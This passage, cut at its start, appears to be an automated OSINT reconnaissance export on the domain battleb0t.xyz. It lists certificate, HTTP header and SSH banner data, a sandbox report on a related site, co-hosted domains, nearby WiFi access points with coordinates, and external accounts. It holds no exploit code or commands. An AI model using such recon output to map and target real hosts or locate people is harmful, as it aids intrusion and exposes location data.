P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Bandlab (Category: music)
https://www.bandlab.com/Altpapier | Altpapier |
| 2023-05-12 02:53:39 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["9954:9C3B:20A7B64:2F7931C:645C5074"], "Age": ["259"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["1"], "X_Timer": ["S1683771768.574276,VS0,VE2"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["8a09b57cb5993eaa6860d607d298dd9826aef348"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["HIT"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100161-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.108.153 |
| 2023-05-12 02:54:17 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3037::6815:470e |
| 2023-05-12 02:48:56 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://financialcafe.net/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_cc0_IESQMMUTEX_0_519"\n "IsoScope_cc0_IESQMMUTEX_0_303"\n "IsoScope_cc0_ConnHashTable<3264>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cc0_IESQMMUTEX_0_331"\n "IsoScope_cc0_IE_EarlyTabStart_0xdc4_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3264"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"52.24.76.118:443"\n "172.64.132.15:443"\n "104.16.87.20:443"\n "142.250.189.232:443"\n "65.8.158.69:443"\n "104.17.25.14:443"\n "185.199.110.153:443"\n "142.250.189.234:443"\n "142.250.191.67:443"\n "142.250.189.174:443"\n "184.27.80.18:443"\n "20.25.53.147:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")\n "transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ke.ca+"&cx=c";Io()&&(f+="&sign="+ke.Td);var g=te||ve?Ho(b,f):void 0;g||(g=rl("https://","http://",ke.jd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Jo(){if(Zh()){return!0}return!1};var Mo=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),No={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Oo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF3A.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFD53.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF39.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFF39.tmp]- [targetUID: 00000000-00003376]\n "CabFD52.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFD52.tmp]- [targetUID: 00000000-00003376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003376]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "FinancialCafeBlack-06_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "FinancialCafeWhite-07_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "imgggnew_1_.png" has type "PNG image data 1920 x 1699 8-bit colormap non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003376]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "profiles_1_.png" has type "PNG image data 136 x 135 4-bit colormap non-interlaced"- [targetUID: N/A]\n "SSL-Certified-icons_1_.png" has type "PNG image data 131 x 50 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "TarFF3A.tmp" has type "data"- Location: [%TEMP%\\TarFF3A.tmp]- [targetUID: 00000000-00003376]\n "6IILQXTA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6IILQXTA.txt]- [targetUID: 00000000-00003376]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FRC8Z6SG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FRC8Z6SG.txt]- [targetUID: 00000000-00003264]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._FED39B3D-CE42-11ED-A569-08002791028F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "wallet_1_.png" has type "PNG image data 137 x 137 4-bit colormap non-interlaced"- [targetUID: N/A]\n "~DFBCF09A62309EF55B.TMP" has type "data"- Location: [%TEMP%\\~DFBCF09A62309EF55B.TMP]- [targetUID: 00000000-00003264]\n "iframeResizerDestination.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "TarFD53.tmp" has type "data"- Location: [%TEMP%\\TarFD53.tmp]- [targetUID: 00000000-00003376]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "https://+c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "https://cct.google/taggy/agent.js"\n Heuristic match: "* Copyright: (c) 2018 David J. Bradshaw - dave@bradshaw.net"\n Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://github.com/twbs/bootstrap/graphs/contributors"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "https://fonts.googleapis.com/css2?family=Montserrat:wght@400;600;800&display=swap"\n Pattern match: "C.JgU/0$"\n Pattern match: "p6gu.gqN/\ufffd\ufffdm\ufffd/\u0225\ufffdy\ufffd]\ufffd\ufffd#\ufffd\ufffd\ufffd\ufffdh\ufffd\ufffd\ufffd\ufffd\u070f\ufffd\ufffdZ\ufffd*~\ufffd$O\ufffd\ufffd\ufffdA\ufffdd\ufffd7\ufffdH2oc\ufffd.v\ufffd\ufffdY#8i&2v\ufffd"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;800&display=swap"\n Pattern match: "MUID30D366FDCBF662572726741ECA726330msn.com/102513402695683110216750963867231023696*"\n Pattern match: ".2.733600913.1680102288financialcafe.net/1088321153638431170546345636378031023695*"\n Pattern match: ".2.733600913.1680102288financialcafe.net/1088321153638431170546345636378031023695*_gidGA1.2.1308012239.1680102288financialcafe.net/1088416549478431023896345636378031023695*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "https://www.google-analytics.com/analytics.js,k=c.F?rp(R(c,gaFunctionName)):rp();if(pa(k)){var"\n Pattern match: "www.google-analytics.com==a.host&& | 185.199.110.153 |
| 2023-05-12 02:50:26 | Physical Address | No | GLEIF | 2 | 0 | 3 | 0 | None | 101 Townsend Street, San Francisco, US-CA, US, 94107 | Cloudflare\, Inc. |
| 2023-05-12 02:54:17 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://nwapi.battleb0t.xyz | nwapi.battleb0t.xyz |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.235): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:17 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3037::6815:470e |
| 2023-05-12 02:54:34 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | San Francisco, California, 94107, United States, North America | 104.21.71.14 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.224 | 104.196.30.220 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | GitHub.com | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:9D:4C:90) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Blogspot (Category: blog)
http://login.blogspot.com | login |
| 2023-05-12 02:44:18 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | InnoPoint (Net ID: 00:02:2D:55:AD:1C) | 50.1188, 8.6843 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Cloudflare, Inc. | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
